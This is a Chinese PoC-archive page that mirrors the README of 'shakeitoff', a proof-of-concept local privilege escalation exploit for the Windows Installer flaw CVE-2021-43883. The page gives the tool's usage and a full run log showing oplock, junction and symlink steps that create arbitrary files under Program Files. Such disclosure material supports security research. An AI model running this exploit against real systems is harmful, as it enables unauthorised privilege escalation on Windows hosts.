支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 8a38c9df3590955da5c175a947f7c267f42adcba

来源
https://github.com/jbaines-r7/shakeitoff
关联漏洞
标题:Microsoft Windows Installer 权限许可和访问控制问题漏洞 (CVE-2021-43883)
Description:Microsoft Windows Installer是美国微软(Microsoft)公司的Windows 操作系统的一个组件。为安装和卸载软件提供了标准基础。 Microsoft Windows Installer存在权限许可和访问控制问题漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Wind
Description
Windows MSI Installer LPE (CVE-2021-43883)
介绍
# shakeitoff

A smaller, minimized, and cleaner version of [InstallerFileTakeOver](https://github.com/klinix5/InstallerFileTakeOver) aka the zero-day exploit that is a "variation" of CVE-2021-41379 (later assigned [CVE-2021-43883](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883)). This version *does not* pop a shell like `InstallerFileTakeOver`. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writablity). Demonstrating code execution is a trivial excercise left up to the reader.

To understand how the attack works, please see the [AttackerKB write up](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis).

## Usage

The tool requires three parameters:

```
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
```

1. -m - the msi to install (full path required). One is provided in this repository (and you should use it since the file paths actually matter).
2. -i - the install path (full path required). This is where the msi is installed / the exploit goes down. The user must specify this beforehand and it *must* be an empty directory. The tool doesn't clean it up because it makes figuring out the bug easier. There also must be a trailing \ because I'm a monster.
3. -p - the file to overwrite/create. Full path required.


The PoC will just copy itself into the target file. 


## Usage Example

```
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free
```

## Credit

* This code is influenced by the original [exploit](https://github.com/klinix5/InstallerFileTakeOver) published by Abdelhamid Naceri (also the original vulnerability discoverer!).
* The `FileOpLock` code is a (slight modified) version pulled out of [angrypolarbearbug2](https://github.com/jackusm/polarbearrepo/tree/f37184a3fc3ffa5ea76035c9fbdee95a39d7b4c3/angrypolarbearbug2)
* Taylor Swift
文件快照

 [4.0K]  /data/pocs/8a38c9df3590955da5c175a947f7c267f42adcba
├── [4.0K]  ais
│   └── [ 13K]  shakeitoff.aip
├── [1.5K]  LICENSE
├── [4.0K]  msi
│   └── [780K]  shakeitoff.msi
├── [4.1K]  README.md
├── [1.4K]  shakeitoff.sln
├── [8.2K]  shakeitoff.vcxproj
├── [1.6K]  shakeitoff.vcxproj.filters
└── [4.0K]  src
    ├── [ 12K]  exploit.cpp
    ├── [ 869]  exploit.h
    ├── [2.9K]  FileOpLock.cpp
    ├── [ 806]  FileOpLock.h
    ├── [2.8K]  main.cpp
    ├── [ 38K]  popl.hpp
    └── [ 956]  winglue.h

3 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。